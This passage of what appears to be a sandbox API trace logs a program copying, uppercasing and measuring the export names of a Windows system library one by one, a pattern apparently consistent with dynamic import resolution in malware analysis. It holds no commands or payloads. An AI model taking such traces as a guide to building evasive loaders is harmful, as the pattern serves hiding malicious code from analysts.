lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.348] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.348] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.348] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.348] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.348] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.348] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.348] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.348] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.348] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.348] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.348] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.348] lstrlenA (lpString="CANCELIO") returned 8 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.348] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.348] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.348] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.348] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.349] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.349] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.349] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.349] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.349] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.349] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.349] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.349] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.349] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.349] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.349] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.349] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.349] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.349] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.349] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.349] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.349] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.349] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.349] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.350] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.350] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.350] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.350] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.350] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.350] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.350] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.350] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.350] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.350] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.350] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.350] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.350] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.350] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.350] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.350] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.350] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.350] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.350] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0085.350] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0085.351] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0085.351] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0085.351] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0085.351] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0085.351] lstrlenA (lpString="COPYCONTEXT") returned 11 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0085.351] lstrlenA (lpString="COPYFILEA") returned 9 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0085.351] lstrlenA (lpString="COPYFILEEXA") returned 11 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0085.351] lstrlenA (lpString="COPYFILEEXW") returned 11 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0085.351] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0085.351] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0085.351] lstrlenA (lpString="COPYFILEW") returned 9 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0085.351] lstrlenA (lpString="COPYLZFILE") returned 10 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0085.351] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0085.351] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.351] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.351] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.351] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.351] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.351] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.352] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.352] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.352] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.352] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.352] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.352] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.352] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.352] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.352] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.352] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.352] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.352] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.352] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.352] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.352] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.352] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.352] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.352] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.352] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.353] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.353] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.353] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.353] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.353] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.353] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.353] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.353] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.353] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.353] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.353] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.353] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.353] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.353] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.353] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.353] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.353] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.353] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.353] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.354] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.354] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.354] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.354] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.354] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.354] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.354] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.354] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.354] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.354] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.354] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.354] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.354] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.354] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.354] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.354] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.354] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.354] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.354] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.355] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.355] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.355] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.355] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.355] lstrcpyA (in: lpString1=0x3f2cf70, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.355] lstrlenA 